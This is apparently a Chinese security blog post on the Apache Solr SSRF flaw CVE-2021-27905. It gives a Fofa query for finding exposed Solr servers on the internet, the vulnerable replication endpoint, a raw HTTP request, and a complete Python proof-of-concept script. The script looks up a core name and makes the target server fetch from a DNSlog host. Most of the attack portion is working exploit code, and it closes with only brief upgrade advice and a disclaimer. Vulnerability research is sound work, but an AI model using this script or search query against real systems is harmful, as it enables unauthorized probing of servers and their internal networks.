(CVE-2021-27905)Apache Solr SSRF 漏洞

0x01 漏洞说明

Apache Solr 存在SSRF漏洞,漏洞利用需要获取core值,结合之前的Solr全版本任意文件读取可以轻松获取core值。

Apache Solr 任意文件读取

0x02 影响版本

  • Apache Solr < 8.8.2

0x03 漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

app='Solr' || app=''Apache-Solr'

Solr的安装配置请查看此前文章:Apache Solr 任意文件读取

漏洞存在位置:

/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}

其中{core}为实际的节点core值,   {dnslog}为Dnslog的地址

(推荐零组文库的DNSlog,自家产就是好用,哎,就硬广告,就是玩~)

获取core这里就不赘叙了,看之前的文章去:Apache Solr 任意文件读取

SSRF数据包:

GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1Host: IPAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Referer: http://IP/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

POC:

# CVE-2021-27905# Apache solr ssrfimport requestsimport urllib3import jsonimport sys, getopturllib3.disable_warnings()def title():    print('[-------------------------------------------------------------]')    print('[--------------      Apache Solr SSRF漏洞      ---------------]')    print('[--------               CVE-2021-27905               ----------]')    print('[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]')    print('[--------              Author:Henry4E36            ------------]')    print('[-------------------------------------------------------------]')def commit():    url = ''    try:        opt, agrs = getopt.getopt(sys.argv[1:], 'hu:d:', ['help', 'url=','dnslog='])        for op, value in opt:            if op == '-h' or op == '--help':                print('''            [-]   Apache Solr SSRF漏洞 (CVE-2021-27905)            [-]   Options:                     -h or --help      :   方法说明                     -u or --url       :   站点URL地址                     -d or --dnslog    :   DnsLog                ''')                sys.exit(0)            elif op == '-u' or op == '--url=':                url = value            elif op == '-d' or op == '--dnslog=':                dnslog = value            else:                print('[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog')                sys.exit()        return url, dnslog    except Exception as e:        print('[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog')        sys.exit(0)def target_core(url):    target_url = url + '/solr/admin/cores?indexInfo=false&wt=json'    headers = {        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'    }    try:        res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)        core = list(json.loads(res.text)['status'])[0]        return core    except Exception as e:        print(f'[!]  目标系统: {url} 出现意外!\n ',e)def ssrf(core,dnslog):    target_url = url + f'/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}'    headers = {        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'    }    try:        res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)        status = json.loads(res.text)['status']        if res.status_code == 200 and status == 'OK':            print(f'[!]  \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m')        else:            print(f'[0]  目标系统: {url} 不存在SSRF漏洞')    except Exception as e:        print(f'[!]  目标系统: {url} 出现意外!\n ', e)if __name__ == '__main__':    title()    url ,dnslog = commit()    core = target_core(url)    ssrf(core,dnslog)

运行效果展示:

0x04 修复建议

升级到最新版本

结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

https://github.com/Henry4E36/Solr-SSRF

(0)

相关推荐